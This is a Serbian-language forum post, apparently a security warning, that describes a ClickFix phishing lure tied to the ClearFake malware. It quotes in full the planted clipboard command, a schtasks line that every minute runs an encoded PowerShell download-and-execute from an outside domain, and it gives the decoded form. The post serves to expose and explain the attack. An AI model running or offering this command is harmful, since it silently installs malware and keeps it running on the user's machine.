12-18-2025, 07:11 PM
Sa Benchmark foruma :
Ovo je ClickFix fišing gde pokušava da natera posetioca da pokrene komandu na svom računaru, komanda koja se nađe kopirana u klipbord je :
Skriveni sadržaj je Base64 enkodovano "iex((irm leqdger .click/321))" i cela ova komanda pokreće skidanje i pokretanja sadržaja sa ovog linka svakog minuta u pozadini i u tišini.
Na linku je naravno malver :
malver je identifikovan kao ClearFake :
Ovo je ClickFix fišing gde pokušava da natera posetioca da pokrene komandu na svom računaru, komanda koja se nađe kopirana u klipbord je :
Code:
schtasks /create /tr "powershell -EncodedCommand aQBlAHgAKAAoAGkAcgBtACAAbABlAHEAZABnAGUAcgAuAGMAbABpAGMAawAvADMAMgAxACkAKQA=" /sc minute /mo 1 /tn "Enter"Skriveni sadržaj je Base64 enkodovano "iex((irm leqdger .click/321))" i cela ova komanda pokreće skidanje i pokretanja sadržaja sa ovog linka svakog minuta u pozadini i u tišini.
Na linku je naravno malver :
malver je identifikovan kao ClearFake :
Quote:ClearFake is a new malicious JavaScript framework deployed on compromised websites to deliver further malware using the drive-by download technique.

